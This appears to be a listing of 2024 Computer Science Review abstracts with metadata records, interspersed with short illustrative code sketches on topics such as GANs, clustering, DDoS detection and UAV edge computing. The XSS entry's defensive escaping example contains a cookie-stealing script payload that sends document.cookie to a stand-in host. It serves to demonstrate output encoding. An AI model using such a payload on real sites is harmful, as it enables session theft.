A comprehensive review on applications of Raspberry Pi
Pub Date: 2024-05-01 | DOI: 10.1016/j.cosrev.2024.100636
Sudha Ellison Mathe, Hari Kishan Kondaveeti, Suseela Vappangi, Sunny Dayal Vanambathina, Nandeesh Kumar Kumaravelu
Raspberry Pi is an invaluable and popular prototyping tool in scientific research for experimenting with a wide variety of ideas, ranging from simple to complex projects. This review article explores how Raspberry Pi is used in various studies, discussing its pros and cons along with its applications in various domains such as home automation, agriculture, healthcare, industrial control, and advanced research. Our aim is to provide a useful resource for researchers, educators, students, product developers, and enthusiasts, helping them to grasp the current status and discover new research possibilities using Raspberry Pi.
A survey on modeling for behaviors of complex intelligent systems based on generative adversarial networks
Pub Date: 2024-04-27 | DOI: 10.1016/j.cosrev.2024.100635
Yali Lv, Jingpu Duan, Xiong Li
This paper provides an extensive and in-depth survey of behavior modeling for complex intelligent systems, focusing specifically on the innovative applications of Generative Adversarial Networks (GANs). The survey not only delves into the fundamental principles of GANs, but also elucidates their pivotal role in accurately modeling the behaviors exhibited by complex intelligent systems. By categorizing behavior modeling into prediction and learning, this survey meticulously examines the current landscape of research in each domain, shedding light on the latest advancements and methodologies driven by GANs. Furthermore, the paper offers insights into both the theoretical underpinnings and practical implications of GANs in behavior modeling for complex intelligent systems, and proposes potential future research directions to advance the field. Overall, this comprehensive survey serves as a valuable resource for researchers, practitioners, and scholars seeking to deepen their understanding of behavior modeling using GANs and to chart a course for future exploration and innovation in this dynamic field.
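For readers new to the adversarial setup this survey builds on, the following minimal PyTorch sketch, our illustration rather than code from the paper, trains a generator to mimic synthetic 2-D "behavior" samples while a discriminator learns to tell real from generated; all dimensions and hyperparameters are assumptions.

```python
# Minimal GAN sketch: generator G maps noise to samples, discriminator D
# scores samples as real (1) or fake (0); they are trained adversarially.
import torch
import torch.nn as nn

real_data = torch.randn(1024, 2) * 0.5 + 2.0   # stand-in for observed behaviors

G = nn.Sequential(nn.Linear(8, 32), nn.ReLU(), nn.Linear(32, 2))
D = nn.Sequential(nn.Linear(2, 32), nn.ReLU(), nn.Linear(32, 1), nn.Sigmoid())
opt_g = torch.optim.Adam(G.parameters(), lr=1e-3)
opt_d = torch.optim.Adam(D.parameters(), lr=1e-3)
bce = nn.BCELoss()

for step in range(2000):
    real = real_data[torch.randint(0, 1024, (64,))]
    fake = G(torch.randn(64, 8))
    # Discriminator step: push D(real) -> 1 and D(fake) -> 0
    loss_d = bce(D(real), torch.ones(64, 1)) + bce(D(fake.detach()), torch.zeros(64, 1))
    opt_d.zero_grad(); loss_d.backward(); opt_d.step()
    # Generator step: fool the discriminator, push D(fake) -> 1
    loss_g = bce(D(fake), torch.ones(64, 1))
    opt_g.zero_grad(); loss_g.backward(); opt_g.step()
```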
{"title":"A survey on modeling for behaviors of complex intelligent systems based on generative adversarial networks","authors":"Yali Lv , Jingpu Duan , Xiong Li","doi":"10.1016/j.cosrev.2024.100635","DOIUrl":"https://doi.org/10.1016/j.cosrev.2024.100635","url":null,"abstract":"<div><p>This paper provides an extensive and in-depth survey of behavior modeling for complex intelligent systems, focusing specifically on the innovative applications of Generative Adversarial Networks (GANs). The survey not only delves into the fundamental principles of GANs, but also elucidates their pivotal role in accurately modeling the behaviors exhibited by complex intelligent systems. By categorizing behavior modeling into prediction and learning, this survey meticulously examines the current landscape of research in each domain, shedding light on the latest advancements and methodologies driven by GANs. Furthermore, the paper offers insights into both the theoretical underpinnings and practical implications of GANs in behavior modeling for complex intelligent systems, and proposes potential future research directions to advance the field. Overall, this comprehensive survey serves as a valuable resource for researchers, practitioners, and scholars seeking to deepen their understanding of behavior modeling using GANs and to chart a course for future exploration and innovation in this dynamic field.</p></div>","PeriodicalId":48633,"journal":{"name":"Computer Science Review","volume":null,"pages":null},"PeriodicalIF":12.9,"publicationDate":"2024-04-27","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"140650636","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Harnessing Heterogeneous Information Networks: A systematic literature review
Pub Date: 2024-04-27 | DOI: 10.1016/j.cosrev.2024.100633
Leila Outemzabet, Nicolas Gaud, Aurélie Bertaux, Christophe Nicolle, Stéphane Gerart, Sébastien Vachenc
The integration of multiple heterogeneous data sources into graph models has been the subject of extensive research in recent years. Harnessing the resulting Heterogeneous Information Networks (HINs) is a complex task that requires reasoning to perform various prediction tasks.
In the last decade, multiple Artificial Intelligence (AI) approaches have been developed to bridge the gap between the abundance of diverse data across various fields and the heterogeneity and complexity of HINs. Particular focus has been directed at developing graph-oriented algorithms that can effectively analyze and leverage the rich information in HINs.
Given the sheer volume of approaches being developed, selecting the most suitable one for a specific objective has become a daunting challenge. This article reviews the recent advances in AI methods for modeling and analyzing HINs. It proposes a cartography of these approaches, structured as a pipeline, offering diverse options at each stage. This structured framework aims to guide practitioners in choosing the most fitting methods based on the nature of their data and specific objectives.
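As a concrete illustration of what a HIN looks like, the sketch below, our own toy example rather than one from the article, builds a tiny typed bibliographic graph with networkx and walks the classic Author-Paper-Author (APA) metapath.

```python
# Minimal Heterogeneous Information Network: typed nodes (author, paper,
# venue) and typed edges, plus a toy traversal of the APA metapath.
import networkx as nx

hin = nx.Graph()
hin.add_node("a1", type="author"); hin.add_node("a2", type="author")
hin.add_node("p1", type="paper");  hin.add_node("v1", type="venue")
hin.add_edge("a1", "p1", type="writes")
hin.add_edge("a2", "p1", type="writes")
hin.add_edge("p1", "v1", type="published_in")

def apa_neighbors(g, author):
    """Co-authors reachable via the Author-Paper-Author metapath."""
    out = set()
    for paper in g.neighbors(author):
        if g.nodes[paper]["type"] != "paper":
            continue
        for other in g.neighbors(paper):
            if g.nodes[other]["type"] == "author" and other != author:
                out.add(other)
    return out

print(apa_neighbors(hin, "a1"))  # -> {'a2'}
```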
Twenty-two years since revealing cross-site scripting attacks: A systematic mapping and a comprehensive survey
Pub Date: 2024-04-23 | DOI: 10.1016/j.cosrev.2024.100634
Abdelhakim Hannousse, Salima Yahiouche, Mohamed Cherif Nait-Hamoud
Cross-site scripting (XSS) is one of the major threats to data privacy and the safe navigation of trusted web applications. Since its disclosure in late 1999 by Microsoft security engineers, several techniques have been developed with the aim of securing web navigation and protecting web applications against XSS attacks. XSS has been and remains in the top 10 list of web vulnerabilities reported by the Open Web Application Security Project (OWASP). Consequently, handling XSS attacks has become one of the major concerns of several web security communities. Despite the numerous studies conducted to combat XSS attacks, the attacks continue to rise. This motivates the study of how interest in XSS attacks has evolved over the years, what has already been achieved to prevent these attacks, and what is missing to restrain their prevalence. In this paper, we conduct a systematic mapping and a comprehensive survey with the aim of answering all these questions. We summarize and categorize existing endeavors that aim to handle XSS attacks and develop XSS-free web applications. The systematic mapping yielded 157 high-quality published studies. By thoroughly analyzing those studies, we draw out a comprehensive taxonomy outlining the various techniques used to prevent, detect, protect against, and defend against XSS attacks and vulnerabilities. The study of the literature revealed a remarkable interest bias toward basic (84.71%) and JavaScript (81.63%) XSS attacks, as well as a dearth of vulnerability repair mechanisms and tools (only 1.48%). Notably, existing vulnerability detection techniques focus solely on single-page detection, overlooking flaws that may span multiple pages. Furthermore, the study brought to the forefront the limitations and challenges of existing attack detection and defense techniques concerning machine learning and content-security policies. Consequently, we strongly advocate the development of more suitable detection and defense techniques, along with an increased focus on addressing XSS vulnerabilities through effective detection (hybrid solutions) and repair strategies. Additionally, there is a pressing need for more high-quality studies to overcome the limitations of promising approaches such as machine learning and content-security policies while also addressing diverse XSS attacks in different languages. We hope this study can serve as guidance for both the academic and practitioner communities in the development of XSS-free web applications.
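As a concrete illustration of one defense category covered by the survey, output encoding, the following minimal Python sketch (ours, not from the paper) HTML-escapes untrusted input before reflecting it, so a script payload renders as inert text instead of executing.

```python
# Output-encoding defense against reflected XSS: escape untrusted input
# before embedding it in HTML. The payload and page template are illustrative.
import html

def render_greeting(user_input: str) -> str:
    safe = html.escape(user_input, quote=True)  # encode &, <, >, ", '
    return f"<p>Hello, {safe}!</p>"

payload = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
print(render_greeting(payload))
# <p>Hello, &lt;script&gt;document.location=&quot;https://evil.example/?c=&quot;+document.cookie&lt;/script&gt;!</p>
```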
{"title":"Twenty-two years since revealing cross-site scripting attacks: A systematic mapping and a comprehensive survey","authors":"Abdelhakim Hannousse , Salima Yahiouche , Mohamed Cherif Nait-Hamoud","doi":"10.1016/j.cosrev.2024.100634","DOIUrl":"https://doi.org/10.1016/j.cosrev.2024.100634","url":null,"abstract":"<div><p>Cross-site scripting (XSS) is one of the major threats menacing the privacy of data and the navigation of trusted web applications. Since its disclosure in late 1999 by Microsoft security engineers, several techniques have been developed with the aim of securing web navigation and protecting web applications against XSS attacks. XSS has been and is still in the top 10 list of web vulnerabilities reported by the Open Web Applications Security Project (OWASP). Consequently, handling XSS attacks has become one of the major concerns of several web security communities. Despite the numerous studies that have been conducted to combat XSS attacks, the attacks continue to rise. This motivates the study of how the interest in XSS attacks has evolved over the years, what has already been achieved to prevent these attacks, and what is missing to restrain their prevalence. In this paper, we conduct a systematic mapping and a comprehensive survey with the aim of answering all these questions. We summarize and categorize existing endeavors that aim to handle XSS attacks and develop XSS-free web applications. The systematic mapping yielded 157 high-quality published studies. By thoroughly analyzing those studies, a comprehensive taxonomy is drawn out outlining various techniques used to prevent, detect, protect, and defend against XSS attacks and vulnerabilities. The study of the literature revealed a remarkable interest bias toward basic (84.71%) and JavaScript (81.63%) XSS attacks as well as a dearth of vulnerability repair mechanisms and tools (only 1.48%). Notably, existing vulnerability detection techniques focus solely on single-page detection, overlooking flaws that may span across multiple pages. Furthermore, the study brought to the forefront the limitations and challenges of existing attack detection and defense techniques concerning machine learning and content-security policies. Consequently, we strongly advocate the development of more suitable detection and defense techniques, along with an increased focus on addressing XSS vulnerabilities through effective detection (hybrid solutions) and repair strategies. Additionally, there is a pressing need for more high-quality studies to overcome the limitations of promising approaches such as machine learning and content-security policies while also addressing diverse XSS attacks in different languages. Hopefully, this study can serve as guidance for both the academic and practitioner communities in the development of XSS-free web applications.</p></div>","PeriodicalId":48633,"journal":{"name":"Computer Science Review","volume":null,"pages":null},"PeriodicalIF":12.9,"publicationDate":"2024-04-23","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"140638499","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
A contemporary review on chatbots, AI-powered virtual conversational agents, ChatGPT: Applications, open challenges and future research directions
Pub Date: 2024-04-09 | DOI: 10.1016/j.cosrev.2024.100632
Avyay Casheekar, Archit Lahiri, Kanishk Rath, Kaushik Sanjay Prabhakar, Kathiravan Srinivasan
This review paper offers an in-depth analysis of AI-powered virtual conversational agents, specifically focusing on OpenAI's ChatGPT. The main contributions of this paper are threefold: (i) an exhaustive review of prior literature on chatbots, (ii) a background on chatbots, including existing chatbots/conversational agents like ChatGPT, and (iii) a UI/UX design analysis of prominent chatbots. Another contribution of this review is the comprehensive exploration of ChatGPT's applications across a multitude of sectors, including education, business, public health, and more. This review highlights the transformative potential of ChatGPT despite the challenges it faces, such as hallucination, biases in training data, jailbreaks, and anonymous data collection. The paper then presents a comprehensive survey of prior literature reviews on chatbots, identifying gaps in prior work and highlighting the need for further research in areas such as chatbot evaluation, user experience, and ethical considerations. It also provides a detailed analysis of the UI/UX design of prominent chatbots, including their conversational flow, visual design, and user engagement, and identifies key future research directions, including mitigating language bias, enhancing ethical decision-making capabilities, improving user interaction and personalization, and developing robust governance frameworks. By addressing these issues, we can ensure that AI chatbots like ChatGPT are used responsibly and effectively across a broad variety of applications. This review will be a valuable resource for researchers and practitioners in understanding the current state and future potential of AI chatbots like ChatGPT.
{"title":"A contemporary review on chatbots, AI-powered virtual conversational agents, ChatGPT: Applications, open challenges and future research directions","authors":"Avyay Casheekar, Archit Lahiri, Kanishk Rath, Kaushik Sanjay Prabhakar, Kathiravan Srinivasan","doi":"10.1016/j.cosrev.2024.100632","DOIUrl":"https://doi.org/10.1016/j.cosrev.2024.100632","url":null,"abstract":"<div><p>This review paper offers an in-depth analysis of AI-powered virtual conversational agents, specifically focusing on OpenAI’s ChatGPT. The main contributions of this paper are threefold: (i) an exhaustive review of prior literature on chatbots, (ii) a background of chatbots including existing chatbots/conversational agents like ChatGPT, and (iii) a UI/UX design analysis of prominent chatbots. Another contribution of this review is the comprehensive exploration of ChatGPT’s applications across a multitude of sectors, including education, business, public health, and more. This review highlights the transformative potential of ChatGPT, despite the challenges it faces such as hallucination, biases in training data, jailbreaks, and anonymous data collection. The review paper then presents a comprehensive survey of prior literature reviews on chatbots, identifying gaps in the prior work and highlighting the need for further research in areas such as chatbot evaluation, user experience, and ethical considerations. The paper also provides a detailed analysis of the UI/UX design of prominent chatbots, including their conversational flow, visual design, and user engagement. The paper also identifies key future research directions, including mitigating language bias, enhancing ethical decision-making capabilities, improving user interaction and personalization, and developing robust governance frameworks. By solving these issues, we can ensure that AI chatbots like ChatGPT are used responsibly and effectively across a broad variety of applications. This review will be a valuable resource for researchers and practitioners in understanding the current state and future potential of AI chatbots like ChatGPT.</p></div>","PeriodicalId":48633,"journal":{"name":"Computer Science Review","volume":null,"pages":null},"PeriodicalIF":12.9,"publicationDate":"2024-04-09","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"140540470","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
AI techniques for IoT-based DDoS attack detection: Taxonomies, comprehensive review and research challenges
Pub Date: 2024-03-30 | DOI: 10.1016/j.cosrev.2024.100631
Bindu Bala, Sunny Behal
Distributed Denial of Service (DDoS) attacks in IoT networks are among the most devastating and challenging cyber-attacks. The number of IoT users has grown exponentially with the increase in IoT devices over the past years. Consequently, the DDoS attack has become the most prominent attack, as vulnerable IoT devices frequently fall victim to it. In the literature, numerous techniques have been proposed to detect IoT-based DDoS attacks. However, techniques based on Artificial Intelligence (AI) have proven effective in detecting cyber-attacks in comparison to alternative techniques. This paper presents a systematic literature review of AI-based tools and techniques used for the analysis, classification, and detection of the most threatening, prominent, and dreadful IoT-based DDoS attacks between 2019 and 2023. A comparative study of real datasets containing IoT traffic features is also presented. The findings of this systematic review provide useful insights into the existing research landscape for designing AI-based models to detect IoT-based DDoS attacks specifically. Additionally, the study sheds light on the IoT botnet lifecycle, various botnet families, the taxonomy of IoT-based DDoS attacks, prominent tools used to launch DDoS attacks, publicly available IoT datasets, the taxonomy of AI techniques, popular software for ML/DL modeling, and a list of research challenges and future directions that may aid in the development of novel and reliable methods for identifying and categorizing IoT-based DDoS attacks.
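To illustrate the kind of AI-based detection pipeline reviewed here, the sketch below, our illustration with synthetic data rather than an approach from the paper, trains a random-forest classifier on simple per-flow features (packet rate, mean packet size, flow duration) to separate benign traffic from flood-style DDoS flows.

```python
# ML-based DDoS detection sketch: a RandomForest trained on per-flow traffic
# features. The synthetic features stand in for a real IoT dataset such as
# those catalogued in the paper.
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report

rng = np.random.default_rng(0)
# columns: packets/s, mean packet size (bytes), flow duration (s)
benign = rng.normal([50, 500, 10], [15, 150, 4], size=(1000, 3))
attack = rng.normal([900, 80, 2], [200, 30, 1], size=(1000, 3))  # high-rate floods
X = np.vstack([benign, attack])
y = np.array([0] * 1000 + [1] * 1000)

X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.3, random_state=0)
clf = RandomForestClassifier(n_estimators=100, random_state=0).fit(X_tr, y_tr)
print(classification_report(y_te, clf.predict(X_te), target_names=["benign", "ddos"]))
```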
{"title":"AI techniques for IoT-based DDoS attack detection: Taxonomies, comprehensive review and research challenges","authors":"Bindu Bala , Sunny Behal","doi":"10.1016/j.cosrev.2024.100631","DOIUrl":"https://doi.org/10.1016/j.cosrev.2024.100631","url":null,"abstract":"<div><p>Distributed Denial of Service (DDoS) attacks in IoT networks are one of the most devastating and challenging cyber-attacks. The number of IoT users is growing exponentially due to the increase in IoT devices over the past years. Consequently, DDoS attack has become the most prominent attack as vulnerable IoT devices are becoming victims of it. In the literature, numerous techniques have been proposed to detect IoT-based DDoS attacks. However, techniques based on Artificial Intelligence (AI) have proven to be effective in the detection of cyber-attacks in comparison to other alternative techniques. This paper presents a systematic literature review of AI-based tools and techniques used for analysis, classification, and detection of the most threatening, prominent, and dreadful IoT-based DDoS attacks between the years 2019 to 2023. A comparative study of real datasets having IoT traffic features has also been illustrated. The findings of this systematic review provide useful insights into the existing research landscape for designing AI-based models to detect IoT-based DDoS attacks specifically. Additionally, the study sheds light on IoT botnet lifecycle, various botnet families, the taxonomy of IoT-based DDoS attacks, prominent tools used to launch DDoS attack, publicly available IoT datasets, the taxonomy of AI techniques, popular software available for ML/DL modeling, a list of numerous research challenges and future directions that may aid in the development of novel and reliable methods for identifying and categorizing IoT-based DDoS attacks.</p></div>","PeriodicalId":48633,"journal":{"name":"Computer Science Review","volume":null,"pages":null},"PeriodicalIF":12.9,"publicationDate":"2024-03-30","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"140330585","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Multiple clusterings: Recent advances and perspectives
Pub Date: 2024-02-26 | DOI: 10.1016/j.cosrev.2024.100621
Guoxian Yu, Liangrui Ren, Jun Wang, Carlotta Domeniconi, Xiangliang Zhang
Clustering is a fundamental data exploration technique for discovering the hidden grouping structure of data. With the proliferation of big data and the increase in volume and variety, the complexity of data multiplicity is increasing as well. Traditional clustering methods provide only a single clustering result, which restricts data exploration to one possible partition. In contrast, multiple clustering can simultaneously or sequentially uncover multiple non-redundant and distinct clustering solutions, revealing several interesting hidden structures of the data from different perspectives. For these reasons, multiple clustering has become a popular and promising field of study. In this survey, we conduct a systematic review of existing multiple clustering methods. Specifically, we categorize existing approaches according to four different perspectives (i.e., multiple clustering in the original space, in subspaces, on multi-view data, and multiple co-clustering). We summarize the key ideas underlying the techniques and their objective functions, and discuss the advantages and disadvantages of each. In addition, we have built a repository of multiple clustering resources (i.e., benchmark datasets and code). Finally, we discuss the key open issues for future investigation.
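As a concrete example of the original-space family of methods, the following sketch, our illustration rather than code from the survey's repository, finds one KMeans partition and then re-clusters the data in the subspace orthogonal to the direction separating its centroids, yielding a second, non-redundant partition.

```python
# Alternative-clustering sketch: remove the direction that explains the first
# partition, then cluster again. Data layout and parameters are illustrative.
import numpy as np
from sklearn.cluster import KMeans

rng = np.random.default_rng(1)
# 4 Gaussian blobs on a grid: rows and columns give two valid groupings
X = np.vstack([rng.normal([i * 6, j * 6], 1.0, size=(100, 2))
               for i in range(2) for j in range(2)])

first = KMeans(n_clusters=2, n_init=10, random_state=0).fit(X)
# Direction separating the first partition's centroids
d = first.cluster_centers_[1] - first.cluster_centers_[0]
d /= np.linalg.norm(d)
# Project onto the orthogonal complement of that direction and re-cluster
X_alt = X - np.outer(X @ d, d)
second = KMeans(n_clusters=2, n_init=10, random_state=0).fit(X_alt)

# Label agreement near 0.5 indicates the two partitions are non-redundant
print(np.mean(first.labels_ == second.labels_))
```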
{"title":"Multiple clusterings: Recent advances and perspectives","authors":"Guoxian Yu , Liangrui Ren , Jun Wang , Carlotta Domeniconi , Xiangliang Zhang","doi":"10.1016/j.cosrev.2024.100621","DOIUrl":"https://doi.org/10.1016/j.cosrev.2024.100621","url":null,"abstract":"<div><p>Clustering is a fundamental data exploration technique to discover hidden grouping structure of data. With the proliferation of big data, and the increase of volume and variety, the complexity of data multiplicity is increasing as well. Traditional clustering methods can provide only a single clustering result, which restricts data exploration to one single possible partition. In contrast, multiple clustering can simultaneously or sequentially uncover multiple non-redundant and distinct clustering solutions, which can reveal multiple interesting hidden structures of the data from different perspectives. For these reasons, multiple clustering has become a popular and promising field of study. In this survey, we have conducted a systematic review of the existing multiple clustering methods. Specifically, we categorize existing approaches according to four different perspectives (i.e., multiple clustering in the original space, in subspaces and on multi-view data, and multiple co-clustering). We summarize the key ideas underlying the techniques and their objective functions, and discuss the advantages and disadvantages of each. In addition, we built a repository of multiple clustering resources (i.e., benchmark datasets and codes). Finally, we discuss the key open issues for future investigation.</p></div>","PeriodicalId":48633,"journal":{"name":"Computer Science Review","volume":null,"pages":null},"PeriodicalIF":12.9,"publicationDate":"2024-02-26","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"139975673","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Sustainable computing across datacenters: A review of enabling models and techniques
Pub Date: 2024-02-13 | DOI: 10.1016/j.cosrev.2024.100620
Muhammad Zakarya, Ayaz Ali Khan, Mohammed Reza Chalak Qazani, Hashim Ali, Mahmood Al-Bahri, Atta Ur Rehman Khan, Ahmad Ali, Rahim Khan
The growth rate of big data and the Internet of Things (IoT) far exceeds the rate at which modern processors can compute on the massive amounts of data being produced. Cluster and cloud technologies, enriched by machine learning applications, have significantly helped sustain performance growth, subject to the underlying network performance. Computer systems were studied for performance improvements, driven by the demands of users' applications, over the past few decades, particularly from 1990 to 2010. From roughly 2010 to 2023, although parallel and distributed computing was omnipresent, the performance improvement rate of a single computing core declined significantly. Over the same period, our digital world of big data and IoT grew considerably, from 1.2 zettabytes (i.e., sextillion bytes) to approximately 120 zettabytes. Moreover, in 2022 cloud datacenters consumed approximately 200 TWh of energy worldwide. Due to this ever-increasing energy demand and the CO₂ emissions it causes, the focus over the past years has shifted to the design of architectures, software, and, in particular, intelligent algorithms that compute on data more efficiently and intelligently. The energy consumption problem is even greater for large-scale systems that involve several thousand servers. Compounding these concerns, cloud service providers currently face more challenges than before, as they struggle to keep up with the extraordinary network traffic produced by the world's fast-tracked move online during the global pandemic. In this paper, we discuss the energy consumption and performance problems of large-scale systems and present several taxonomies of energy- and performance-aware methodologies. We consider both energy and performance efficiency, which distinguishes this study from those previously published in the literature. Important research papers have been surveyed to characterise and recognise crucial and outstanding topics for further research. We discuss numerous state-of-the-art methods and algorithms from the literature that claim to advance the energy efficiency and performance of large-scale computing systems, and we identify numerous open challenges.
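One widely studied energy-saving technique in this literature is consolidating virtual machines onto as few hosts as possible so idle hosts can be powered down. The sketch below, our illustration with assumed CPU demands, host capacity, and power figures, pairs first-fit-decreasing bin packing with the common linear power model P(u) = P_idle + (P_peak - P_idle) * u.

```python
# Energy-aware VM consolidation sketch: first-fit-decreasing bin packing
# plus a linear host power model. All numbers are illustrative assumptions.
def consolidate(vm_demands, host_capacity=1.0):
    hosts = []  # each host = list of VM CPU demands placed on it
    for demand in sorted(vm_demands, reverse=True):
        for host in hosts:
            if sum(host) + demand <= host_capacity:
                host.append(demand)
                break
        else:
            hosts.append([demand])  # power on a new host
    return hosts

def power_watts(utilization, idle=100.0, peak=250.0):
    # Linear model: P(u) = P_idle + (P_peak - P_idle) * u
    return idle + (peak - idle) * utilization

vms = [0.6, 0.5, 0.4, 0.3, 0.2, 0.2, 0.1]
placement = consolidate(vms)
print(len(placement), "hosts powered on")                       # 3
print(sum(power_watts(sum(h)) for h in placement), "W total")   # 645.0
```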
{"title":"Sustainable computing across datacenters: A review of enabling models and techniques","authors":"Muhammad Zakarya , Ayaz Ali Khan , Mohammed Reza Chalak Qazani , Hashim Ali , Mahmood Al-Bahri , Atta Ur Rehman Khan , Ahmad Ali , Rahim Khan","doi":"10.1016/j.cosrev.2024.100620","DOIUrl":"https://doi.org/10.1016/j.cosrev.2024.100620","url":null,"abstract":"<div><p>The growth rate in big data and internet of things (IoT) is far exceeding the computer performance rate at which modern processors can compute on the massive amount of data. The cluster and cloud technologies enriched by machine learning applications had significantly helped in performance growths subject to the underlying network performance. Computer systems have been studied for improvement in performance, driven by user’s applications demand, in the past few decades, particularly from 1990 to 2010. By the mid of 2010 to 2023, albeit parallel and distributed computing was omnipresent, but the total performance improvement rate of a single computing core had significantly reduced. Similarly, from 2010 to 2023, our digital world of big data and IoT has considerably increased from 1.2 Zettabytes (i.e., sextillion bytes) to approximately 120 zettabytes. Moreover, in 2022 cloud datacenters consumed <span><math><mo>∼</mo></math></span> 200TWh of energy worldwide. However, due to their ever-increasing energy demand which causes <span><math><msub><mrow><mi>CO</mi></mrow><mrow><mn>2</mn></mrow></msub></math></span> emissions, over the past years the focus has shifted to the design of architectures, software, and in particular, intelligent algorithms to compute on the data more efficiently and intelligently. The energy consumption problem is even greater for large-scale systems that involve several thousand servers. Combining these fears, cloud service providers are presently facing more challenges than earlier because they fight to keep up with the extraordinary network traffic being produced by the world’s fast-tracked move to online due to global pandemics. In this paper, we deliberate the energy consumption and performance problems of large-scale systems and present several taxonomies of energy and performance aware methodologies. We debate over the energy and performance efficiencies, both, which make this study different from those previously published in the literature. Important research papers have been surveyed to characterise and recognise crucial and outstanding topics for further research. We deliberate numerous state-of-the-art methods and algorithms, stated in the literature, that claim to advance the energy efficiency and performance of large-scale computing systems, and recognise numerous open challenges.</p></div>","PeriodicalId":48633,"journal":{"name":"Computer Science Review","volume":null,"pages":null},"PeriodicalIF":12.9,"publicationDate":"2024-02-13","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"139726310","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Fundamental design aspects of UAV-enabled MEC systems: A review on models, challenges, and future opportunities
Pub Date: 2024-02-01 | DOI: 10.1016/j.cosrev.2023.100615
Mohd Hirzi Adnan, Zuriati Ahmad Zukarnain, Oluwatosin Ahmed Amodu
The huge prospects of the Internet of Things (IoT) have led to an ever-growing demand for computing power by IoT users to enable various applications. Multi-access edge computing (MEC) research and development has rapidly gained attention during the last decade. The ability to deploy edge servers at different points across a content delivery network, offering communication and computing services close to mobile user devices, is one of the main factors driving the evolution of MEC. Furthermore, MEC has been considered a potentially transformational approach for fifth-generation (5G) and beyond-5G (B5G) networks, as well as a potential improvement to conventional cloud computing. Unmanned aerial vehicles (UAVs) can serve as effective aerial platforms offering reliable and ubiquitous connections in wireless communication networks due to their distinctive qualities, such as high cruising altitude, on-demand deployment, and three-dimensional (3D) maneuverability. The number of research studies published in this area has dramatically increased due to the growing interest in UAV-enabled MEC. Although UAV-enabled MEC systems have been well studied, the existing models are becoming increasingly heterogeneous and scattered, without harmony. This paper provides a comprehensive analysis of the literature on UAV-enabled MEC systems, with a special focus on system modeling and optimization techniques for five identified domains: energy efficiency, resource allocation, trajectory control, latency, and security. For each domain, we highlight the recent advances, critical findings, and the advantages and disadvantages of the identified techniques, which are analyzed and discussed with emphasis on their constraints and performance metrics. We also discuss a general system model for each highlighted domain and draw lessons from the system optimization and system modeling techniques identified in this paper. We then discuss open issues related to UAV-enabled MEC systems in each highlighted domain, including problem formulation and optimization techniques. Finally, this paper lays out directions for future research to solve the aforementioned problems associated with UAV-enabled MEC systems.
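To ground the latency and energy-efficiency domains discussed above, here is a worked sketch of the canonical local-versus-offload trade-off that UAV-MEC system models formalize; all constants (task size, CPU frequencies, channel rate, power figures) are illustrative assumptions, not values from the paper.

```python
# Offloading trade-off sketch: run a task on the device or on a UAV-mounted
# edge server, comparing completion time and device-side energy.
C = 2e9        # task compute demand: 2 Gcycles
D = 5e6 * 8    # task input size: 5 MB expressed in bits
f_local = 1e9  # device CPU frequency: 1 GHz
f_edge = 10e9  # UAV edge server CPU frequency: 10 GHz
r = 50e6       # uplink rate to the UAV: 50 Mbit/s
p_cpu, p_tx = 0.9, 1.3  # device compute / transmit power in watts

t_local = C / f_local            # 2.0 s of local computation
e_local = p_cpu * t_local        # 1.8 J of device energy

t_offload = D / r + C / f_edge   # 0.8 s transmit + 0.2 s edge compute = 1.0 s
e_offload = p_tx * (D / r)       # device only pays for transmission: 1.04 J

print(f"local:   {t_local:.2f} s, {e_local:.2f} J")
print(f"offload: {t_offload:.2f} s, {e_offload:.2f} J")
# Here offloading halves latency and cuts device energy; a weaker channel
# (smaller r) flips the decision, which is exactly the trade-off the surveyed
# optimization formulations capture.
```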
